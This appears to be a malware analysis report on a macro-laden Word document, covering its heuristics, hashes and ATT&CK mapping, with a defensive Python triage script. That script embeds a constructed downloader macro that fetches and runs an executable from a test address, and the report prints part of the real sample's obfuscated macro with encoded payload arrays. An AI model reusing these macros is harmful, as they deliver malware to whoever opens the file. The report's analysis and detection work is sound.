Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8dceb2c50d57f3e4…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 305.5 KB
Created: 2015-12-16 14:32:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: eec9588428352be8d921c8e9eb7cba43
SHA-1: 38895259d3e697b3e986ddeb9d26385f0bf28ca0
SHA-256: 8dceb2c50d57f3e4b12d8d02d8ca15f88d636367310a3e6f27eaa5a32f3bc8a6
Risk score: 202

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

This Office document contains VBA macros, including a Document_Open handler that calls Shell(). Document_Open runs as soon as the document is opened with macros enabled, so the macro is built to execute an arbitrary command line with no further user interaction, most likely to download and run a second-stage payload. The extracted module (see the artifact below) is heavily obfuscated: it declares an external function from a randomly named library ("WAfnY2e") and pads its routines with junk statements and large integer arrays, so the actual command line is not visible in the static source. The password-protected archive lure heuristic points to a multi-stage delivery in which the document hands the user the password for an encrypted archive or attachment, keeping the real payload unreadable to gateway scanners until the user extracts it.

Heuristics (6)

  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. Office executes the cached p-code whenever its version matches the host, so a document whose compressed source has been replaced (VBA stomping) can present harmless or empty source while still running the compiled malicious code; this finding should be weighed even when the decoded source looks clean.
  • Password-protected archive handoff [high] SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment, a technique used to keep payloads encrypted until after gateway scanning
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/  (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#  (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/  (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/  (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#  (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#  (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/  (in document text, OLE body)
    • http://www.iec.ch  (in document text, OLE body)
    • http://ns.adobe.com/tiff/1.0/  (in document text, OLE body)
    • http://ns.adobe.com/exif/1.0/  (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main  (in document text, OLE body)
    All eleven URLs are schema namespace identifiers (XMP, RDF, Dublin Core, DrawingML) or the IEC reference text carried in an sRGB ICC profile, i.e. metadata from embedded images rather than addresses the macro contacts. None of them should be used as an indicator. No download URL appears in plaintext in the static extraction; if the macro fetches a payload, the address is assembled at run time inside the obfuscated code.
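To make the heuristics above concrete, here is an added example (written for this page; it is not the analysis service's own detection code) that applies the same classes of checks to decoded VBA source and to document body text: auto-exec entry points, shell/download/object-execution tokens, Declare statements importing native libraries, password-for-attachment lure wording, and a URL pass that separates image-metadata namespace identifiers from addresses worth pivoting on. The macro snippet, the body text and the 203.0.113.5 address (a TEST-NET range) are constructed for the example; the heuristic names and severities are modelled on the report's and are not the service's identifiers. It operates on extracted source only and does not cover the p-code-only case, which needs a p-code disassembler.

```python
"""Source-level macro triage heuristics (constructed example, stdlib only)."""
import re
from urllib.parse import urlparse

# Entry points Office runs without user interaction (Document_Open class).
AUTOEXEC = re.compile(
    r"\b(Document_Open|AutoOpen|Auto_Open|Workbook_Open|Document_Close|AutoClose|AutoExec)\b",
    re.I)
# Tokens that run commands, fetch content or instantiate COM objects (Shell() class).
EXEC_TOKENS = re.compile(
    r"\b(Shell|WScript\.Shell|CreateObject|URLDownloadToFile[AW]?|ShellExecute[AW]?|XMLHTTP)\b",
    re.I)
# Declare statements importing native code; the library name is triage evidence.
DECLARE = re.compile(
    r"\bDeclare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+\w+\s+Lib\s+\"([^\"]+)\"", re.I)
# Password-for-attachment wording (password-protected archive lure class).
LURE = re.compile(
    r"\bpassword\b.{0,60}\b(?:archive|zip|attachment|attached)\b"
    r"|\b(?:archive|zip|attachment|attached)\b.{0,60}\bpassword\b", re.I | re.S)
# Hosts that reach document text only as schema identifiers from embedded image
# metadata (XMP, RDF, Dublin Core, DrawingML) or the sRGB ICC profile text.
SCHEMA_HOSTS = {"ns.adobe.com", "www.w3.org", "purl.org",
                "schemas.openxmlformats.org", "www.iec.ch"}
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")


def triage_vba(src):
    """Map heuristic name -> (severity, sorted evidence) for one VBA module."""
    findings = {}
    auto = sorted({m.group(1) for m in AUTOEXEC.finditer(src)})
    execs = sorted({m.group(1) for m in EXEC_TOKENS.finditer(src)})
    libs = sorted({m.group(1) for m in DECLARE.finditer(src)})
    if auto:
        findings["OLE_VBA_AUTOEXEC"] = ("high", auto)
    if execs:
        # Execution tokens alongside an auto-exec entry point are the worst case.
        findings["OLE_VBA_EXEC_TOKEN"] = ("critical" if auto else "medium", execs)
    if libs:
        findings["OLE_VBA_DECLARE_LIB"] = ("medium", libs)
    return findings


def lure_text(body):
    """True when the body text hands the reader a password for an attachment."""
    return LURE.search(body) is not None


def classify_urls(text, channel):
    """Tag each URL: metadata namespaces are noise; macro-reached URLs matter most."""
    out = []
    for u in URL_RE.findall(text):
        host = urlparse(u).hostname or ""
        if host in SCHEMA_HOSTS:
            label = "metadata-namespace"
        elif channel == "macro":
            label = "macro-reached"
        else:
            label = "document-body"
        out.append((u, label))
    return out


def verdict(findings, lured=False):
    """Collapse findings into a verdict: critical wins, anything else is suspicious."""
    sev = {s for s, _ in findings.values()}
    if "critical" in sev:
        return "malicious"
    if sev or lured:
        return "suspicious"
    return "clean"


# Constructed sample macro: downloader declared via urlmon, fired from Document_Open.
SAMPLE_VBA = r'''
Private Declare PtrSafe Function dl Lib "urlmon" Alias "URLDownloadToFileA" (ByVal a As LongPtr, ByVal u As String, ByVal f As String, ByVal r As Long, ByVal c As LongPtr) As Long
Sub Document_Open()
    On Error Resume Next
    Dim p As String
    p = Environ("TEMP") & "\stage2.exe"
    dl 0, "http://203.0.113.5/stage2.exe", p, 0, 0
    Shell p, vbHide
End Sub
'''
# Constructed benign macro for contrast.
BENIGN_VBA = r'''
Sub FormatHeading()
    Selection.Font.Bold = True
End Sub
'''
# Constructed body text: a lure sentence plus the kind of XMP/ICC noise seen above.
SAMPLE_BODY = ('Please open the attached archive; the password is Inv2017. '
               'xmlns:xmp="http://ns.adobe.com/xap/1.0/" '
               'xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" '
               'IEC http://www.iec.ch')

if __name__ == "__main__":
    found = triage_vba(SAMPLE_VBA)
    for name, (sev, evidence) in found.items():
        print(f"{name:<22} {sev:<9} {', '.join(evidence)}")
    for url, label in classify_urls(SAMPLE_VBA, "macro") + classify_urls(SAMPLE_BODY, "body"):
        print(f"{label:<20} {url}")
    print("verdict:", verdict(found, lure_text(SAMPLE_BODY)))
```

The severity escalation in triage_vba mirrors the report's own scoring logic: a Shell() call on its own is only medium because plenty of legitimate automation shells out, but the same token inside a module that also carries a Document_Open entry point is critical, since the command runs the moment macros are enabled.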

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 45572 bytes
SHA-256: 074da90464abf51c23f7ff945226c40fabe923d1c28997bed084c25f4620b532

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function KLdP5FaGebJdf Lib "WAfnY2e" Alias "T7CYs9JpQeKYa" (ByVal QuhNED016lne As String, OJkjkgzBzN As Long) As Long
#Else
Private Declare Function KLdP5FaGebJdf lib "WAfnY2e" Alias "T7CYs9JpQeKYa"(byval QuhNED016lne as String, OJkjkgzBzN as Long ) as Long
#End If
Dim EFnMW9uqqwMh As String, A4cmLA5fea As Integer
Dim A4cmLA5fea1() As Variant, A4cmLA5fea2() As Variant, A4cmLA5fea3() As Variant, A4cmLA5fea4() As Variant, A4cmLA5fea5() As Variant, A4cmLA5fea6() As Variant, A4cmLA5fea7() As Variant, A4cmLA5fea8() As Variant, A4cmLA5fea9() As Variant, A4cmLA5fea10() As Variant
Dim A4cmLA5fea11() As Variant, A4cmLA5fea12() As Variant, A4cmLA5fea13() As Variant, A4cmLA5fea14() As Variant, A4cmLA5fea15() As Variant, A4cmLA5fea16() As Variant, A4cmLA5fea17() As Variant, A4cmLA5fea18() As Variant, A4cmLA5fea19() As Variant, A4cmLA5fea20() As Variant
Dim A4cmLA5fea21() As Variant, A4cmLA5fea22() As Variant, A4cmLA5fea23() As Variant, A4cmLA5fea24() As Variant, A4cmLA5fea25() As Variant, A4cmLA5fea26() As Variant, A4cmLA5fea27() As Variant, A4cmLA5fea28() As Variant, A4cmLA5fea29() As Variant, A4cmLA5fea30() As Variant, A4cmLA5fea31() As Variant, A4cmLA5fea32() As Variant, A4cmLA5fea33() As Variant, A4cmLA5fea34() As Variant, A4cmLA5fea35() As Variant, A4cmLA5fea36() As Variant
Sub LHJwPn()
NrSyi8bt999vkR = 71
If Abs(6) = 57 Then OzAJDIA = 7498
Load QHW95ygCCXLKMlehi
DateSerial 52, 90, 50
DeleteSetting "Qp4Y8D4vz89Olb"
Randomize
DyCTQ9UKs03HGVdP = EOF(96)
If IsMissing(31) = True Then XwRmTkWR84BfUqAHC = 80
DWcjwawOjsm = CVErr(31)
Hour 53
AppActivate 41
HDM9913zDtS = 60
End Sub
Function zKK(U6jMo As Integer) As Boolean
PdKLCGN = 61
Static HFBwwFtzVi0lGw38q As Byte
G7UUZ5FN3z = 78
HFBwwFtzVi0lGw38q = HFBwwFtzVi0lGw38q + 1
OuWaqUF1z = 48
If HFBwwFtzVi0lGw38q = 1 Then Debug.Assert Not zKK(59)
AeIBD = 73
zKK = HFBwwFtzVi0lGw38q = 0
Q9dlGz5OfQm = 70
HFBwwFtzVi0lGw38q = 0
QPM3j8cFUa0L = 81
End Function
Sub OJwHPvvkNBx()
WBJkej = 47
On Error Resume Next
B0K8bUdQ = 54
A4cmLA5fea1() = Array(205, 250, 201, 224, 251, 227, 50, 81, 126, 59, 75, 21, 29, 69, 127, 10, 44, 1, 83, 0, 9, 44, 42, 19, 12, 8, 20, 103, 115, 80, 29, 40, 55, 1, 12, 95, 83, 111, 87, 119, 87, 109, 99, 124, 17, 55, 95, 124, 0, 117, 58, 108, 70, 117, 69, 5, 8, 48, 123, 72, 4, 99, 35, 47, 90, 9, 100, 43, 120, 27, 94, 67, 66, 68, 82, 20, 47, 85, 121, 113, 76, 97, 17, 66, 36, 110, 114, 67, 33, 120, 111, 15, 124, 66, 92, 78, 8, 60, 111, 51, 14, 87, 103, 57, 24, 47, 43, 120, 116, 100, 110, 127, 64, 70, 101, 113, 19, 41, 77, 121, 87, 75, 99, 122, 19, 32, 22, 43, 249, 199, 128, 192, 147, 140, 163, 148, 158, 143, 161, 255, 189, 177, 247, 178, 175, 189, 177, 149, 156, 142, 157, 187, 136, 179, 183, 211, 183, 196, 169, 188, 209, 231, 245, 165, 198, 251, 198, 227, 197, 249, 249, 170, 202, 244, 204, 225, 221, 147, 227, 195, 214, 234, 213, 242, 211, 159, 232, 207, 204, 249, 205, 132, 169, 240, 210, 196, 223, 156, 219, 208, 200, 194, 237)
VpGcg5LX = 51
A4cmLA5fea2() = Array(189, 204, 199, 246, 225, 171, 156, 154, 204, 227, 229, 226, 226, 161, 255, 209, 220, 194, 211, 204, 139, 153, 167, 199, 170, 250, 231, 130, 225, 140, 187, 184, 248, 158, 167, 250, 247, 205, 181, 224, 183, 196, 191, 135, 163, 248, 168, 124, 109, 110, 1, 101, 89, 1, 40, 21, 94, 14, 52, 35, 35, 108, 95, 92, 24, 126, 71, 21, 14, 124, 60, 0, 73, 5, 37, 38, 7, 19, 95, 91, 8, 29, 0, 196, 165, 221, 255, 200, 166, 60, 22, 9, 58, 32, 12, 94, 12, 50, 38, 105, 43, 115, 22, 33, 111, 39, 10, 46, 88, 48, 49, 84, 14, 108, 85, 53, 19, 11, 15, 22, 108, 57, 42, 22, 53, 4, 61, 14, 112, 65, 126, 87, 101, 75, 117, 17, 109, 9, 127, 35, 6, 4, 26, 18, 104, 3, 1, 39, 94, 84, 77, 72, 6, 54, 15, 59, 108, 117, 97, 94, 22, 125, 16, 53, 68, 54, 6, 4, 70, 36, 29, 90, 74, 119, 31, 119, 37, 107, 11
... (truncated)